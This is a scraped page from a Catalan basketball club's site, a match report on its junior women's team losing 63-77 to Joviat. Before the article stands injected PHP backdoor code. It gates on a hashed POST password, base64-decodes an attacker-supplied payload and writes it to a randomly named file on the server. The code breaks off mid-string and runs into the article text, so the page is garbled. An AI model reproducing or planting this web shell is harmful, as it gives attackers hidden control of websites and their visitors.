function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Júnior femení Preferent bada massa en defensa i perd contra el Joviat (63-77) - Tgn Bàsquet Club -

El Júnior femení Preferent bada massa en defensa i perd contra el Joviat (63-77)

Updated: març 14, 2021

L’equip Júnior femení Preferent del TGN Bàsquet ha perdut contra el Joviat en el seu debut a la lliga del Campionat d’Espanya Júnior Femení. El conjunt lila ha disputat el seu primer partit tot i que ja es tractava de la segona jornada, però com que està emmarcat en un grup on el nombre d’equips és imparell, a la primera jornada li va tocar descansar. Les liles s’han mostrat molt irregulars durant tot el partit, combinant moments de bon joc i d’intensitat amb d’altres de badades defensives que han permès que el Joviat dominés amb prou comoditat durant tot el partit.

Durant un dels moments de rauxa tarragonina, el marcador mostrava un resultat de 37-42 a 4:58 pel final del 3Q, però el tècnic del conjunt visitant ha demanat un temps mort i des d’aleshores el parcial ha estat de 0-11 (37-53, a 1:12 del final del període). Allí han quedat enterrades les opcions de victòria del TGN Bàsquet, tot i que ho ha intentat tot fins al final.

El matx ha estat dominat d’inici per les visitants que s’han aprofitat que la pivot lila, Anguera, s’ha carregat de faltes massa de pressa i, a partir d’aleshores, el domini en el rebot del Joviat li ha permès jugar amb més tranquil·litat. Els atacs del TGN Bàsquet han estat prou bons, però ha pagat la seva falta de concentració defensiva, i les visitants han anotat, sovint, sota el cèrcol (12-23, 1Q).

En el segon període hi ha hagut una millora de les locals que, tot i patir en el rebot i no ser prou sòlides defensivament, han estat capaces d’igualar el partit (evitant més diferències) a còpia de transicions ofensives. Algunes errades en safates en aquestes transicions han impedit que l’avantatge s’escurcés encara més (29-38 al descans).

Les millors sensacions del segon quart han tingut continuïtat en el tercer, però quan el marcador s’estava ajustant, el temps mort de les visitants ha tallat de soca-rel la remuntada lila i quan faltaven 10 minuts pel final del matx el resultat era de 40-57.

La victòria quedava lluny, però les tarragonines han continuat lluitant de valent, quan semblava que podien escurçar les distàncies, un triple o un rebot ofensiu del Joviat refredava les esperances del TGN Bàsquet que s’ha quedat sense temps i energies per aconseguir el triomf.